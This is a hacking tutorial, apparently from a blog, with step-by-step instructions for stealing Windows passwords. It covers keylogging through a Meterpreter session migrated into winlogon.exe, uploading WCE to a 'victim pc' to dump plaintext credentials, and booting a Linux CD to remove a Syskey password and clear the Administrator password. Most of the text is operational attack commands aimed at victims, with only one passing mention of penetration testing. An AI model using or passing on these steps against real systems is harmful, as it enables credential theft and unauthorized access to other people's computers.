Hack Remote Windows Password using Keylogger in Meterpreter

Once you got the meterpreter session use ‘ps‘ command to displays a list of running processes on the target.

The next step is we need to migrate Meterpreter to the winlogon.exe process. Victim winlogon.exe process ID is 600. Now type migrate 600 now we can start the keylogger

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

This will capture the credentials of all users logging into the system as long as this is running.

Hack Remote Windows Passwords in Plain Text with WCE

Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Step 1: Now upload the wce.exe in victim pc using

Upload /pentest/passwords/wce/wce.exe .

Step 2: type shell to get the command prompt of victim pc

Step 3: now use wce.exe –w command to get password in text form

How to Break Syskey Password Windows 7 and Server 2008

  1. Download Syskey Remover

  2. You can write this image with any image burning software. We are using our traditional software Nero.
  3. Now go to the system and boot form this CD.

Press Enter on boot options

This window bootable Linux scripts will search your entire hard disk and show all the available partitions on hard disk.

Press Enter

Press 1 and than Enter

Press Enter

Press 1 ( To reset the Password ) and than Enter

Press 2  ( To change the syskey status)  and then Enter

Press y and then Enter

Now, your syskey password will get removed

Now we will reset windows administrator password


Press 1 ( Edit user data & password) and then Enter
Type Administrator and then Enter
Press 1 (To clear the password) and then Enter
Press   !  sign and enter to come back on pervious menu.
Press  Q  (  For quit) and then Enter
Press y  ( To save the changes made so far ) and then Enter
Press N(For no more changes) and then Enter

Now press ALT + CTRL + DEL to restart the system